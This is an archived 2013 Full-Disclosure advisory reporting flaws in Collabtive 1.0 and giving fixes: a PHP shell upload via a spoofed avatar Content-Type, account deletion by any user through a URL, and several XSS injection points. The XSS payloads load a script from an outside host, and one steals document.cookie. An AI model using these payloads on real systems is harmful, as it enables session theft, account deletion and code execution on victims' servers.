lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 22 Jul 2013 13:49:29 +0200
From: Enrico Cinquini <enrico.cinquini@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Collabtive multiple vulnerabilities.

=============================================
- Release date: July 22th, 2013
- Discovered by: Enrico Cinquini
- Severity: High
=============================================

 I. VULNERABILITY
-------------------------

Collabtive multiple vulnerabilities.


 II. INTRODUCTION
-------------------------

The last version of Collabtive (1.0) is affected by multiple
vulnerabilities.


 IV. DESCRIPTION
-------------------------

1) UPLOAD PHP FILE INSIDE AVATAR:

In the following function:

https://hostname/secprj/manageuser.php?action=edit

it's possible to upload a php file inside avatar by modifying the
Content-Type
as following:

Content-Type: image/jpeg

The file will be uploaded inside the standard directory and encoded with a
six-characters number at the end of the file, like the following example:

https://hostname/secprj/files/standard/avatar/uploadedshell_104185.php

It's really fast to enumerate all the possibility and to execute the file
uploaded.

This vulnerability was identified in older releases, but it's still present.



2) ACCOUNT DELETION

It's possible to delete any account from every user, by calling the
following URL:

https://hostname/secprj/manageuser.php?action=del&id=5

By setting the value "del" to parameter "action", the account with setted
ID will be
deleted, even if will apper an error message.

An "User" account with no privilege can delete all kind of account,
including Administrators.



3) CROSS SITE SCRITPING - CHAT:

The application is vulnerable to XSS attack in the managechat.php page. The
parameter affected is 'userto':

https://hostname/secprj/managechat.php?userto=<SCRIPT/XSS SRC="
http://ha.ckers.org/xss.js"></SCRIPT>&uid=2



4) CROSS SITE SCRITPING - TIMETRACKER

The page managetimetracker.php is affected by Cross Site Scripting
vulnerability.
The POST parameters 'start' and 'end' are vulnerable, for example, to the
following XSS:

"><SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>



5) CROSS SITE SCRITPING - Multiple vulnerabilities:

The application is vulnerable to XSS attack in different pages:

manageproject.php
managemilestone.php
managetask.php
managemessage.php

To exploit the vulnerability it's necessary to set a new object name
(project, milestone,
task, message) like the following example:

"><SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

the script will be executed in the same page, and in dashboard,too.



6) CROSS SITE SCRITPING - PROFILE

The page manageuser.php?action=editform is affected by Cross Site Scripting
vulnerability.
All the profile fields are vulnerable, for example, to the following
injection:

<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>


 VI. BUSINESS IMPACT
-------------------------

An attacker could upload malicious file, delete accounts and perform XSS
attacks.


 VII. SYSTEMS AFFECTED
-------------------------

Version 1.0 is vulnerable.


 VIII. SOLUTION
-------------------------

It's necessary to:

- implement a strong upload filter to prevent the upload of malicious file

- implement an input validation mechanism to avoid being vulnerable to XSS
injection

- review and correct users profiling to prevent a user can delete other
accounts


 IX. REFERENCES
-------------------------

Collabtive website:

http://collabtive.o-dyn.de


 X. CREDITS
-------------------------

The vulnerability has been discovered by:

Enrico Cinquini enrico(dot)cinquini(at)gmail(dot)com


 XI. VULNERABILITY HISTORY
-------------------------

June 20th, 2013: Vulnerability identification
June 21th, 2013: Vendor notification
July 22th, 2013: Vulnerability disclosure


 XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuse
of this information.

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ